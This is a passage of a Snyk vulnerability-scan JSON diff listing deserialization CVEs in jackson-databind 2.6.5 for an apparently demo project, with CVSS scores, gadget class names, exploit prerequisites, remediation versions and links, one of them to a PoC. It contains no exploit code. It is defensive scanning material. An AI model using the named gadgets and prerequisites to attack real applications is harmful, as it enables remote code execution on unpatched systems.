"com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T15:03:20.847507Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:24Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.920721Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": 
"com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2642", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.137266Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of 
Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10969" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-758m-v56v-grj4" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T16:25:31.113677Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": 
"2020-03-26T14:55:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:31Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.582959Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2662", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.826605Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.268261Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.576513Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", + "epssDetails": { + "percentile": "0.81534", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-rf6r-2c4q-2vwg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-26T17:09:01.709397Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-26T14:55:20Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-26T14:55:20Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.576513Z", + "socialTrendAlert": false, + 
"severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2670", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-11113", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "cvssSources": [ + { + 
"type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:21.749219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.889961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.400473Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11113" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9vvp-fxw6-jcxr" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T08:36:41.369827Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.400473Z", + "socialTrendAlert": false, + "severityWithCritical": 
"high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2664", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + 
"severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:57.628835Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:44:29.297635Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.145935Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", + "epssDetails": { + "percentile": "0.81603", + "probability": "0.00786", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-11111" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-v3xw-c963-f5hc" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-31T09:28:18.821103Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-31T06:16:37Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-31T06:16:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.145935Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", + "title": "GItHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2666", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:44:29.301384Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:14.113524Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", 